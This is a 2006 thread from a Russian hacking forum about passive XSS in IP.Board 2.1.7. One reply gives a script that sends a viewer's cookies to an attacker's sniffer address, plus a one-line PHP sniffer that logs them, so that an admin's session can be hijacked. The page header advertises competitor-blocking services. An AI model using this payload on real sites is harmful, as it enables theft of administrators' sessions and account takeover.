Форум АНТИЧАТ - Xss в Ipb 2.1.7

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Форумы
Xss в Ipb 2.1.7

Опции темы

Поиск в этой теме

Опции просмотра

Xss в Ipb 2.1.7

15.09.2006, 21:41

Fr-Ron

Участник форума

Регистрация: 10.09.2006

Сообщений: 185

Провел на форуме:
1654589

Репутация: 337

Xss в Ipb 2.1.7

Давайте поподробнее поговорим об пассивном Xss в Ibp 2.1.7.
Предупреждаю - опыта у меня ой как мало и понимаю маловато, поэтому и пришел сюда.
Фичу с внедрением алерта в заголовок ЛС я усвоил. Но мелькало что-то про модеров... чего там можно добиться? И до чего вобще можно дойти, используя этот Xss?
Только с описанием поподробней плз.

15.09.2006, 21:55

LoFFi

Участник форума

Регистрация: 21.02.2006

Сообщений: 285

Провел на форуме:
1347867

Репутация: 408

Отправить сообщение для LoFFi с помощью ICQ

XSS - Cross Site Scripting

Данная бага позволяет тебе украсть куки. Требуется чтоб админ глянул эту страничку с XSS скриптом - ты получишь куки, которые тебе обеспечат доступ. Для того чтобы получить куки тебе понадобится сниффер - скрипт который приймет сигнал от XSS скрипта и запишет куки.

XSS скрипт:

Код:

<script>img = new Image(); img.src='_PATH_';</script>

Где _PATH_ - путь к снифферу. Я лично юзаю свой сниффер. Можешь юзать например ачатовский.

Пример XSS + sniff

Код:

<script>img = new Image(); img.src='_PATH_';</script>

sniff

Код:

<? fputs(fopen("log.txt","a+"),$_SERVER['QUERY_STRING']);
?>

15.09.2006, 22:00

Fr-Ron

Участник форума

Регистрация: 10.09.2006

Сообщений: 185

Провел на форуме:
1654589

Репутация: 337

Хм, админ должен заглянуть на страничку с Xss... Т.е. в случае с ИБП он должен просто отурыть мое ЛС, в заголовке которого и будет Xss?

И вопрос наперед - когда я получу куки, что надо будет сделать для их расшифровки, дабы получить пароль? Просто залогиниться не устраивает =(

15.09.2006, 22:04

Azazel

Заведующий всем

Регистрация: 17.04.2005

Сообщений: 1,062

Провел на форуме:
5957900

Репутация: 561

Используя XSS ты можешь получить права супермодера. Об этом говорили подробно много раз.
Я не считаю нужным оставлять тему открытой ибо, либо куки с xss = супермодер, либо инфа с базы и => пасс админа.

Закрыто.

ПС: Я пожалуй предупрежу: Если ты маловато знаешь - попробуй узнать больше своими силами, тут тебе не faq.

__________________
Full DNS report

15.09.2006, 22:07

Azazel

Заведующий всем

Регистрация: 17.04.2005

Сообщений: 1,062

Провел на форуме:
5957900

Репутация: 561

Юзай поиск. Все ответы есть.

__________________
Full DNS report

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
IPB 2.1.7 passive XSS	degeneration x	Форумы	20	24.02.2007 00:02
куда заливаются файлы? Ipb 2.1.7	Aztec	Форумы	9	06.11.2006 13:29
Может кто нибудь определить префикс в Ipb 2.1.7	samurays	Форумы	8	06.09.2006 19:42
XSS vbulletin and IPB v2.1.7 With IE	liauliau	Форумы	6	16.08.2006 15:19
Xss для новичков	Micr0b	Уязвимости	0	04.06.2006 18:25

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход